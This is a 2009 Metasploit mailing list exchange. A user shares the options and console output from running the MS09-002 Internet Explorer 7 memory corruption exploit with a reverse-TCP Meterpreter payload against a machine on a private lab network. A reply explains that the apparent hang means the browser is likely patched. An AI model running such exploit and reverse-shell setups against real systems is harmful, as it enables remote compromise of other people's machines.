Metasploit mailing list archives
use of ms09_002 and xml_corruption modules
From: natron at invisibledenizen.org (natron)
Date: Wed, 1 Apr 2009 13:09:43 -0500
It's not hanging. The module's letting you know a request came in and it responded with the html code. Depending on your payload, if the exploit was successful, you would see further messages about the additional stages being downloaded and then dumped at the payload prompt.

What you're seeing is what you would see if the browser was not vulnerable to either of those exploits. You have most likely already patched.

On Wed, Apr 1, 2009 at 1:07 PM, jeffs <jeffs at speakeasy.net> wrote:
When I use either of these modules 'sploit just hangs on the last line -- am I to presume that means my version of IE7 is not vulnerable or do I perchance have a wrong setting below? thanks.

Same result with xml_corruption..

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH  test             no        The URI to use for this exploit (default is random)

Payload options (windows/reflectivemeterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.101    yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/test
[*]  Local IP: http://192.168.1.101:8080/test
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.100:1704...  <----- just hangs here